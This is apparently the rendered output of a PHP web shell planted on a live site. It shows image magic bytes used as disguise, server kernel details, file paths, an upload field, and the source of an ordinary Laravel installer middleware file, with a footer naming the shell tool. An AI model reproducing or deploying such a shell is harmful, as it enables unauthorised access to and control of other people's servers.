ÿØÿà JFIF  H H ÿÛ C   GIF89; Eú tiket mi chék chéúfetál .

Eú tiket mi chék chéúfetál .

System: Linux srv913213 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64

Current Path : /var/www/yapwebtv.com/Modules_old/Installer/Http/Middleware/
Upload File :
Current File : /var/www/yapwebtv.com/Modules_old/Installer/Http/Middleware/CheckNotInstalledMiddleware.php

<?php

namespace Modules\Installer\Http\Middleware;

use Closure;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Schema;
use DB;

class CheckNotInstalledMiddleware
{
    /**
     * Handle an incoming request.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  \Closure  $next
     * @return mixed
     */
    public function handle(Request $request, Closure $next)
    {
        try {
            \DB::connection()->getPdo();
              
        } catch (\Exception $e) {

            return response()->view('installer::index');
        }


        if (Schema::hasTable('settings') && Schema::hasTable('users') && \Config::get('app.app_installed') == 'yes') {
            return redirect('/');
        } 
        return $next($request);

        
    }
}

xxxxx1.0, XXX xxxx
SPECIMENT MINI SHELL - RECODED FROM PHANTOM GHOST